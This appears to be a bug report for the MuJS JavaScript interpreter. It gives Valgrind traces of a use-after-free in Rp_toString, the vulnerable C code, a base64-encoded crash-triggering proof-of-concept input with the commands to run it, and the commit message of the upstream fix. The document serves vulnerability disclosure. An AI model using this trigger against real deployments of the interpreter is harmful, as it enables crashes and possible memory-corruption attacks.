Source file: mujs/jsregexp.c:161 Function: Rp_toString Compile Flags CFLAGS += -g3 -ggdb -O0 Compile Command: make Valgrind short output: > valgrind ../../temp/mujs/build/mujs /tmp/Rp_toString_UaF.txt ==59994== Memcheck, a memory error detector ==59994== Copyright (C) 2002-2015, and GNU GPL'd, by Julian Seward et al. ==59994== Using Valgrind-3.12.0.SVN and LibVEX; rerun with -h for copyright info ==59994== Command: ../../temp/mujs/build/mujs /tmp/Rp_toString_UaF.txt ==59994== ==59994== Invalid read of size 1 ==59994== at 0x4C2EDD2: strlen (vg_replace_strmem.c:454) ==59994== by 0x416E35: Rp_toString (jsregexp.c:161) ==59994== by 0x40C573: jsR_callcfunction (jsrun.c:1015) ==59994== by 0x40C89D: js_call (jsrun.c:1057) ==59994== by 0x4021FE: jsV_toString (jsvalue.c:56) ==59994== by 0x4023EA: jsV_toprimitive (jsvalue.c:103) ==59994== by 0x4029B5: jsV_tonumber (jsvalue.c:209) ==59994== by 0x409DF4: js_toint32 (jsrun.c:263) ==59994== by 0x40EBBF: jsR_run (jsrun.c:1618) ==59994== by 0x40C3F2: jsR_callfunction (jsrun.c:982) ==59994== by 0x40C7C9: js_call (jsrun.c:1049) ==59994== by 0x40E1E5: jsR_run (jsrun.c:1460) ==59994== Address 0x5e2d919 is 9 bytes inside a block of size 26 free'd ==59994== at 0x4C2CDFB: free (vg_replace_malloc.c:530) ==59994== by 0x4040AB: js_defaultalloc (jsstate.c:13) ==59994== by 0x409103: js_free (jsrun.c:50) ==59994== by 0x407747: js_gc (jsgc.c:205) ==59994== by 0x40D51B: jsR_run (jsrun.c:1279) ==59994== by 0x40C3F2: jsR_callfunction (jsrun.c:982) ==59994== by 0x40C7C9: js_call (jsrun.c:1049) ==59994== by 0x40E1E5: jsR_run (jsrun.c:1460) ==59994== by 0x40C4B8: jsR_callscript (jsrun.c:998) ==59994== by 0x40C83D: js_call (jsrun.c:1053) ==59994== by 0x4046A1: js_dofile (jsstate.c:152) ==59994== by 0x401EBB: main (main.c:176) ==59994== Block was alloc'd at ==59994== at 0x4C2BBCF: malloc (vg_replace_malloc.c:299) ==59994== by 0x4040C6: js_defaultalloc (jsstate.c:17) ==59994== by 0x40906E: js_malloc (jsrun.c:34) ==59994== by 0x40912D: jsV_newmemstring (jsrun.c:55) ==59994== by 0x409532: js_pushstring (jsrun.c:115) ==59994== by 0x4037EB: js_concat (jsvalue.c:512) ==59994== by 0x40E6A4: jsR_run (jsrun.c:1551) ==59994== by 0x40C3F2: jsR_callfunction (jsrun.c:982) ==59994== by 0x40C7C9: js_call (jsrun.c:1049) ==59994== by 0x40E1E5: jsR_run (jsrun.c:1460) ==59994== by 0x40C4B8: jsR_callscript (jsrun.c:998) ==59994== by 0x40C83D: js_call (jsrun.c:1053) ==59994== ==59994== Invalid read of size 1 ==59994== at 0x4C2EDE4: strlen (vg_replace_strmem.c:454) ==59994== by 0x416E35: Rp_toString (jsregexp.c:161) ==59994== by 0x40C573: jsR_callcfunction (jsrun.c:1015) ==59994== by 0x40C89D: js_call (jsrun.c:1057) ==59994== by 0x4021FE: jsV_toString (jsvalue.c:56) ==59994== by 0x4023EA: jsV_toprimitive (jsvalue.c:103) ==59994== by 0x4029B5: jsV_tonumber (jsvalue.c:209) ==59994== by 0x409DF4: js_toint32 (jsrun.c:263) ==59994== by 0x40EBBF: jsR_run (jsrun.c:1618) ==59994== by 0x40C3F2: jsR_callfunction (jsrun.c:982) ==59994== by 0x40C7C9: js_call (jsrun.c:1049) ==59994== by 0x40E1E5: jsR_run (jsrun.c:1460) ==59994== Address 0x5e2d91a is 10 bytes inside a block of size 26 free'd ==59994== at 0x4C2CDFB: free (vg_replace_malloc.c:530) ==59994== by 0x4040AB: js_defaultalloc (jsstate.c:13) ==59994== by 0x409103: js_free (jsrun.c:50) ==59994== by 0x407747: js_gc (jsgc.c:205) ==59994== by 0x40D51B: jsR_run (jsrun.c:1279) ==59994== by 0x40C3F2: jsR_callfunction (jsrun.c:982) ==59994== by 0x40C7C9: js_call (jsrun.c:1049) ==59994== by 0x40E1E5: jsR_run (jsrun.c:1460) ==59994== by 0x40C4B8: jsR_callscript (jsrun.c:998) ==59994== by 0x40C83D: js_call (jsrun.c:1053) ==59994== by 0x4046A1: js_dofile (jsstate.c:152) ==59994== by 0x401EBB: main (main.c:176) ==59994== Block was alloc'd at ==59994== at 0x4C2BBCF: malloc (vg_replace_malloc.c:299) ==59994== by 0x4040C6: js_defaultalloc (jsstate.c:17) ==59994== by 0x40906E: js_malloc (jsrun.c:34) ==59994== by 0x40912D: jsV_newmemstring (jsrun.c:55) ==59994== by 0x409532: js_pushstring (jsrun.c:115) ==59994== by 0x4037EB: js_concat (jsvalue.c:512) ==59994== by 0x40E6A4: jsR_run (jsrun.c:1551) ==59994== by 0x40C3F2: jsR_callfunction (jsrun.c:982) ==59994== by 0x40C7C9: js_call (jsrun.c:1049) ==59994== by 0x40E1E5: jsR_run (jsrun.c:1460) ==59994== by 0x40C4B8: jsR_callscript (jsrun.c:998) ==59994== by 0x40C83D: js_call (jsrun.c:1053) ==59994== ==59994== Invalid read of size 1 ==59994== at 0x4C2EA89: strcat (vg_replace_strmem.c:303) ==59994== by 0x416E6C: Rp_toString (jsregexp.c:163) ==59994== by 0x40C573: jsR_callcfunction (jsrun.c:1015) ==59994== by 0x40C89D: js_call (jsrun.c:1057) ==59994== by 0x4021FE: jsV_toString (jsvalue.c:56) ==59994== by 0x4023EA: jsV_toprimitive (jsvalue.c:103) ==59994== by 0x4029B5: jsV_tonumber (jsvalue.c:209) ==59994== by 0x409DF4: js_toint32 (jsrun.c:263) ==59994== by 0x40EBBF: jsR_run (jsrun.c:1618) ==59994== by 0x40C3F2: jsR_callfunction (jsrun.c:982) ==59994== by 0x40C7C9: js_call (jsrun.c:1049) ==59994== by 0x40E1E5: jsR_run (jsrun.c:1460) ==59994== Address 0x5e2d919 is 9 bytes inside a block of size 26 free'd ==59994== at 0x4C2CDFB: free (vg_replace_malloc.c:530) ==59994== by 0x4040AB: js_defaultalloc (jsstate.c:13) ==59994== by 0x409103: js_free (jsrun.c:50) ==59994== by 0x407747: js_gc (jsgc.c:205) ==59994== by 0x40D51B: jsR_run (jsrun.c:1279) ==59994== by 0x40C3F2: jsR_callfunction (jsrun.c:982) ==59994== by 0x40C7C9: js_call (jsrun.c:1049) ==59994== by 0x40E1E5: jsR_run (jsrun.c:1460) ==59994== by 0x40C4B8: jsR_callscript (jsrun.c:998) ==59994== by 0x40C83D: js_call (jsrun.c:1053) ==59994== by 0x4046A1: js_dofile (jsstate.c:152) ==59994== by 0x401EBB: main (main.c:176) ==59994== Block was alloc'd at ==59994== at 0x4C2BBCF: malloc (vg_replace_malloc.c:299) ==59994== by 0x4040C6: js_defaultalloc (jsstate.c:17) ==59994== by 0x40906E: js_malloc (jsrun.c:34) ==59994== by 0x40912D: jsV_newmemstring (jsrun.c:55) ==59994== by 0x409532: js_pushstring (jsrun.c:115) ==59994== by 0x4037EB: js_concat (jsvalue.c:512) ==59994== by 0x40E6A4: jsR_run (jsrun.c:1551) ==59994== by 0x40C3F2: jsR_callfunction (jsrun.c:982) ==59994== by 0x40C7C9: js_call (jsrun.c:1049) ==59994== by 0x40E1E5: jsR_run (jsrun.c:1460) ==59994== by 0x40C4B8: jsR_callscript (jsrun.c:998) ==59994== by 0x40C83D: js_call (jsrun.c:1053) ==59994== ==59994== Invalid read of size 1 ==59994== at 0x4C2EAA3: strcat (vg_replace_strmem.c:303) ==59994== by 0x416E6C: Rp_toString (jsregexp.c:163) ==59994== by 0x40C573: jsR_callcfunction (jsrun.c:1015) ==59994== by 0x40C89D: js_call (jsrun.c:1057) ==59994== by 0x4021FE: jsV_toString (jsvalue.c:56) ==59994== by 0x4023EA: jsV_toprimitive (jsvalue.c:103) ==59994== by 0x4029B5: jsV_tonumber (jsvalue.c:209) ==59994== by 0x409DF4: js_toint32 (jsrun.c:263) ==59994== by 0x40EBBF: jsR_run (jsrun.c:1618) ==59994== by 0x40C3F2: jsR_callfunction (jsrun.c:982) ==59994== by 0x40C7C9: js_call (jsrun.c:1049) ==59994== by 0x40E1E5: jsR_run (jsrun.c:1460) ==59994== Address 0x5e2d91a is 10 bytes inside a block of size 26 free'd ==59994== at 0x4C2CDFB: free (vg_replace_malloc.c:530) ==59994== by 0x4040AB: js_defaultalloc (jsstate.c:13) ==59994== by 0x409103: js_free (jsrun.c:50) ==59994== by 0x407747: js_gc (jsgc.c:205) ==59994== by 0x40D51B: jsR_run (jsrun.c:1279) ==59994== by 0x40C3F2: jsR_callfunction (jsrun.c:982) ==59994== by 0x40C7C9: js_call (jsrun.c:1049) ==59994== by 0x40E1E5: jsR_run (jsrun.c:1460) ==59994== by 0x40C4B8: jsR_callscript (jsrun.c:998) ==59994== by 0x40C83D: js_call (jsrun.c:1053) ==59994== by 0x4046A1: js_dofile (jsstate.c:152) ==59994== by 0x401EBB: main (main.c:176) ==59994== Block was alloc'd at ==59994== at 0x4C2BBCF: malloc (vg_replace_malloc.c:299) ==59994== by 0x4040C6: js_defaultalloc (jsstate.c:17) ==59994== by 0x40906E: js_malloc (jsrun.c:34) ==59994== by 0x40912D: jsV_newmemstring (jsrun.c:55) ==59994== by 0x409532: js_pushstring (jsrun.c:115) ==59994== by 0x4037EB: js_concat (jsvalue.c:512) ==59994== by 0x40E6A4: jsR_run (jsrun.c:1551) ==59994== by 0x40C3F2: jsR_callfunction (jsrun.c:982) ==59994== by 0x40C7C9: js_call (jsrun.c:1049) ==59994== by 0x40E1E5: jsR_run (jsrun.c:1460) ==59994== by 0x40C4B8: jsR_callscript (jsrun.c:998) ==59994== by 0x40C83D: js_call (jsrun.c:1053) ==59994== ReferenceError: 'aWturn' is not defined at /tmp/Rp_toString_UaF.txt:1 at /tmp/Rp_toString_UaF.txt:1 ==59994== ==59994== HEAP SUMMARY: ==59994== in use at exit: 1,117,425 bytes in 3,659 blocks ==59994== total heap usage: 54,235 allocs, 50,576 frees, 19,517,848 bytes allocated ==59994== ==59994== LEAK SUMMARY: ==59994== definitely lost: 17,272 bytes in 1 blocks ==59994== indirectly lost: 1,097,217 bytes in 3,656 blocks ==59994== possibly lost: 2,936 bytes in 2 blocks ==59994== still reachable: 0 bytes in 0 blocks ==59994== suppressed: 0 bytes in 0 blocks ==59994== Rerun with --leak-check=full to see details of leaked memory ==59994== ==59994== For counts of detected and suppressed errors, rerun with: -v ==59994== ERROR SUMMARY: 34 errors from 4 contexts (suppressed: 0 from 0) Affected code: 154 static void Rp_toString(js_State *J) 155 { 156 js_Regexp *re; 157 char *out; 158 159 re = js_toregexp(J, 0); 160 161 out = js_malloc(J, strlen(re->source) + 6); /* extra space for //gim */ 162 strcpy(out, "/"); 163 strcat(out, re->source); 164 strcat(out, "/"); 165 if (re->flags & JS_REGEXP_G) strcat(out, "g"); 166 if (re->flags & JS_REGEXP_I) strcat(out, "i"); 167 if (re->flags & JS_REGEXP_M) strcat(out, "m"); 168 169 if (js_try(J)) { 170 js_free(J, out); 171 js_throw(J); 172 } 173 js_pop(J, 0); 174 js_pushstring(J, out); 175 js_endtry(J); 176 js_free(J, out); 177 } Proof Of Concept (base64 encoded): > base64 /tmp/Rp_toString_UaF.txt ZXZhbChmdW5jdGlvbihwLGEsYyxrLGUsZCl7ZT1mdW5jdGlvbihkKXtyZXR1cm4gY307aWYoDCcn LnJlcGxhY2UoL14vJVN0cmluZykpe3doaWxlKGMtZCl7ZFtjXT1rW2NdfHxjfWs9W2Z1bmN0aW9u KGUpe3JldHVybiBDW2VdfV07ZT1mdW5jdGlvbigpe3JldHVybidcXHUrJ307Yz0xfTt3aGlsZShj LS0pe2lmKGtbY10pe2QrcC5yZXBsYWNlKG5ldyBSZWdFeHAoJ1w2QXx4NjR8eDRcYicrZShhKSsn XGViJywnZycpJmtbY10pfX1hV3R1cm4rcH0oJ2qNjY2NU3RyaW5EjY2NjY2NjY2NjY2NfmluZzl8 NDV8NTCGMzN8NDQxfDM5fDQ4fDQ3fDM0fDM3fDQ2fDPxfDQ5fDM1fDMyfDMxfDM6fG9bY109a1tj XXx8Y31wPVtmdW5jdGlvbnwyMVwnWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpYWlpaQFpaWlpaWlpa YFpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWgFaWlpaWlpaWlpaWlpaWlpaWlpaWlpa WlpaWlpaWlpaWlpaWlpaRlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWjdaWlpaWlpa GlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpa WlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWmRaWjtaWlpaWlpaWlpaWlpaWlpa WlpaWlpaWlpaWlpaWlpaWlpaWv//WlpaWlpaWlpaWlpaQyk7cih5KTtyKEYsSiknLDYyLDB4ZDlF LCd8fHx8fHx1/Hx8eDIwfF8weDJiODd8eDY1fHgyQzJ4NjF8eDcyfHg3M3x4Njl8eE44fHg2RXx4 NzR8eDZDfHg2RnxfMHgyNjRleDJ8eDZaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlraWlpaWlpaWlpa WlpaWlpaWlpaWlpAWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpa6ANaWlpa WlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpa WlpaWlpaWlpaWlpaZlpaWlpaWlpaWlpaWlpaWlpaWlpaWjl8NDV8NTCGMzN8NDQxfDM5fDQ4fDQ3 fDM0fDM3fDQ2fDPxfDQ5fDM1fDMyfDMxfDM6fG9bY109a1tjXXx8Y31wPVtmdW5jdGlvbnwyMVwn WlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpYWlpaQFpaWlpaWlpaYFpaWlpaWkZaWlpaWlpaWlpaWlpa WlpaWlpaWlpaWlpaWgFaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaRlpaWlpa WlpaWlpaWlpaWlogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgIFpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpa WlpaWlpaWlpaWlpaWlpaWtpaWlpaWlpaT1paWlpaWlpaWlpaWkBaWlpaWlpaWlpaWlpaWlpaWlpa WlpaWlpaWlpaWlpaWlpaWlpaWlroA1paWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpa WlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpGWlpaWlpaWlpaWlpaWlpaWiAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg WlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpa2lpaWlpaWlpP WlpaWlpaWlpaWlpaQFpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWugDWlpa WlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpa WlpaWlpaWlpaWlpaWlpaWvj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4 +Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4 +Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4 +Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4 +Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4 +Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4WlpaWlpaWlpaWlpaQ/j4+Pj4+Pj4 +Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4 +Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4 +Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4 +Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4 +Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4 +Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4 +Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4 +Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4 +Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4 +Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4 +Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4 +Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4 +Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4 +Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4 +Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4 +Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4 +Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4 +Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4 +Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4 +Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4 +Pj4+FpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpa WlpaWlpaWlpaWmV0dXJ2WlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWm5a WlpaWlpaa1paWloDWlpaWlpaWlpaWlo/WlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpa WlpaWlpaWlpaWlpaWlpaWlpaWlpa//9aWlpaWlpaWlpaWlpDKTtyKHkpO3IoRixKKScsNjIsMHhk OUUsJ3x8fHx8fHX8fHx4MjB8XzB4MmI4N3x4NjV8eDJDMng2MXx4NzJ8eDczfHg2OXx4Tjh8eDZF fHg3NHx4NkN8eDZGfF8weDI2NGV4Mnx4NjNNWlpaWlpaclpaWlpaWlpaWlpaWlpaWlpaWlpaWlpa WlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaZXR1cm5a WlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpablpaWlpaWlprWlpaWgNaWlpa WlpaWlpaWj9aWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpDKTtyXzBleD18eDU0fF8w eDI2NGV4M3xzcGFjZXx4NEZ8eDREfG1vbnRoU3RyaW5nfHg0MXx4NjJ8eDc5fGNvbW1hfHg3Nnx4 Nzd8eDJFfHg2RHx4MkYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICB8eDZBfHg2NHx4NDZ8eDQ0fDEwfHg1M3wxMXwxMnx4NEV8ZnVuY3Rpb26fMTMnLnNwbGl0 KCcnKSwwLHt9KSkKCg== Proof Of Concept execution: base64 -d /tmp/b64PoC.poc > /tmp/proof.txt valgrind ../../temp/mujs/build/mujs /tmp/proof.txt
commit 5c337af4b3df80cf967e4f9f6a21522de84b392a Author: Tor Andersson <tor.andersson@artifex.com> Date: Wed Sep 21 16:01:08 2016 +0200 Fix bug 697142: Stale string pointer stored in regexp object. Make sure to make a copy of the source pattern string. A case we missed when adding short and memory strings to the runtime. The code assumed all strings passed to it were either literal or interned.